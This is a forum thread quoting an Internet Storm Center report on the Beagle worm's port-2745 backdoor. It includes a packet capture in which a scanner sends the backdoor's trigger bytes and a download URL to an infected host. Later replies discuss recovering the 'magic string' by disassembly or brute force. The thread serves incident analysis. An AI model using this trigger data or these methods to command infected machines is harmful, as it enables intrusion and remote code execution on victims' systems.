Found at Internet Storm... http://isc.incidents.org/diary.php?date=2004-03-29

Beagle Virus Exploit
====================
Versions of the 'Beagle' (aka Bagle) virus open a back door on port 2745 (TCP). We do monitor increased scanning activity for this port. Today, a reader submitted a tool which is used to scan for Beagle infected systems. If the tool finds port 2745 open, it will send the 'magic string' to open the backdoor. Next, a URL is send to the system. The Bagle infected system will attempt to download the content of the URL and execute it.

Sample session (using a netcat listener):

1. Establish TCP connection to port 2745

18:29:09.159691 10.1.0.129.1043 > 10.1.0.13.2745: S
2963418754:2963418754(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0084 4000 8006 e5b4 0a01 0081 E..0..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e82 0000 0000 ................
0x0020 7002 4000 409f 0000 0204 05b4 0101 0402 p.@.@...........
18:29:09.159784 10.1.0.13.2745 > 10.1.0.129.1043: S
3650381978:3650381978(0) ack 2963418755 win 5840 <mss
1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0000 4000 4006 2639 0a01 000d E..0..@.@.&9....
0x0010 0a01 0081 0ab9 0413 d994 689a b0a2 2e83 ..........h.....
0x0020 7012 16d0 278f 0000 0204 05b4 0101 0402 p...'...........
18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF)
0x0000 4500 0028 0085 4000 8006 e5bb 0a01 0081 E..(..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5010 4470 26b3 0000 0204 05b4 0101 P.Dp&.........

2. Send "exploit buffer"
18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win
17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF)
0x0000 4500 0028 8cbe 4000 4006 9982 0a01 000d E..(..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5010 16d0 5442 0000 0000 0000 0000 P...TB........

3. 'reply' from infected host (just 'CR' in this case)


18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win
5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........

4. send URL for download
18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win
17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http

Prooves that something is out there that utilises this viruses backdoor capabilities.

i see
i think the most importent thing is to know 'magic string'
but i cannt find it from

Just curious would it be possible to bruteforce the password of this worm?

it should possible to see if if you packet sniff what data is sent in and out surly?

buz

I'm not exactly suggesting someone does this, but the best thing to do would be to get hold of the Beagle virus, and disassemble it. Perhaps you could try "grepping" the disassembly for CMP instructions - this might be a tell-tale sign of the virus comparing the supplied potential magic string to the correct magic string. From this, you might be able to find the magic string as a static value in the virus assembly code.


-Shaun.

this traffic log is from an Beagle.A/.B or .C.
this version uses no hashes it usese a "direct password". which stands clearly in the code. so it's not hard to find it out.
this versions of the worm are DEAD.
all higher version use a hash function. so you have to brutforce it.

Bruteforcing must be possible since sPiKiE already coded his sploit for it, but its not public...